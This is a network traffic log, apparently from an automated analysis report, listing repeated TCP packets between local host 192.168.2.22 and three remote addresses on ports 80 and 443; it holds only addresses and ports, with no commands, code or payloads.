Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.210.214.26:80 -> 192.168.2.22:49161
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 104.21.84.67:443 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 172.67.215.45:443 -> 192.168.2.22:49163
